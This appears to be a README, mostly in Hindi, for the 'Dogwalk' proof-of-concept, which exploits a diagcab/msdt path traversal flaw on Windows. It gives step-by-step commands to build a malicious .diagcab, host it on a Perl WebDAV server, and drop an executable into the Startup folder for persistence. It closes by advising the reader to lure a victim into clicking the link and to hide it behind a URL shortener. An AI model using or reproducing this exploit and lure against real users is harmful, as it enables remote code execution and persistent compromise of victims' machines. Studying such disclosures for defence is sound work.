
🐾Dogwalk PoC (Windows पर RCE प्राप्त करने के लिए diagcab फ़ाइल का उपयोग करके)
मुख्य अवधारणा: Microsoft की Diagcab तकनीक (msdt) में पाथ ट्रैवर्सल कमजोरी जो रिमोट कोड एक्ज़ीक्यूशन का कारण बन सकती है।
पूरी एडवाइज़री आप ब्लॉग पोस्ट में पा सकते हैं
यह कमजोरी 2 वर्षों से रिपोर्ट की गई है (@irsl द्वारा) और अब भी कोई समाधान नहीं है!
यह Proof-of-Concept एक webdav सर्वर सेट करता है जो एक दुर्भावनापूर्ण .diagcab फ़ाइल होस्ट करता है जो C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup में एक दुर्भावनापूर्ण एक्ज़ीक्यूटेबल लिखने के लिए पाथ ट्रैवर्सल करेगा। इस फ़ोल्डर में एक्ज़ीक्यूटेबल लिखने पर, उपयोगकर्ता जब भी Windows मशीन शुरू करता है, वह निष्पादित हो जाता है, इसे बूट लॉगऑन ऑटोस्टार्ट एक्ज़ीक्यूशन कहा जाता है।
तो, मूल रूप से हमें क्या चाहिए:
.diagcab फ़ाइल.diagcab फ़ाइल डाउनलोड करेगा(💡 url ब्राउज़ करते समय ब्राउज़र को फ़ाइल स्वचालित रूप से डाउनलोड करवाने के लिए Content-type: application/octet-stream रिस्पॉन्स हेडर का उपयोग करें)
यदि आप चरण-दर-चरण आगे बढ़ने में बहुत आलसी (या जल्दी में) हैं:
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
अन्यथा ↓↓
.diagcab फ़ाइल तैयार करें.diagcfg सरल XML फ़ाइलें हैं जो एक या अधिक डायग्नोस्टिक पैकेजों का संदर्भ रखती हैं और उनके बारे में मेटा जानकारी प्रदान करती हैं.diagcab एक्सटेंशन के साथ सहेजा जाता है।पहले custom.diagcfg बनाएँ:
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
और hotfix895214.diagcab बनाएँ:
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
अंत में, इसे ./webdav/diagcab-webdav-poc/config निर्देशिका में ले जाएँ
पीड़ित मशीन पर स्थानांतरित करने के लिए एक्ज़ीक्यूटेबल को ./webdav/malicious निर्देशिका में रखें... (यहाँ हम क्लासिक calc.exe का उपयोग करते हैं)
...और सर्वर लॉन्च करें:
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
दुर्भावनापूर्ण .diagcab https://[WEBDAV_URL]/config/hotfix895214.diagcab पर उपलब्ध है। अब आपको एक पीड़ित को इस लिंक पर क्लिक करने के लिए लुभाना होगा।
(💡 आप इसे कम संदिग्ध दिखाने के लिए URL शॉर्टनर का उपयोग कर सकते हैं)
🐾🐾
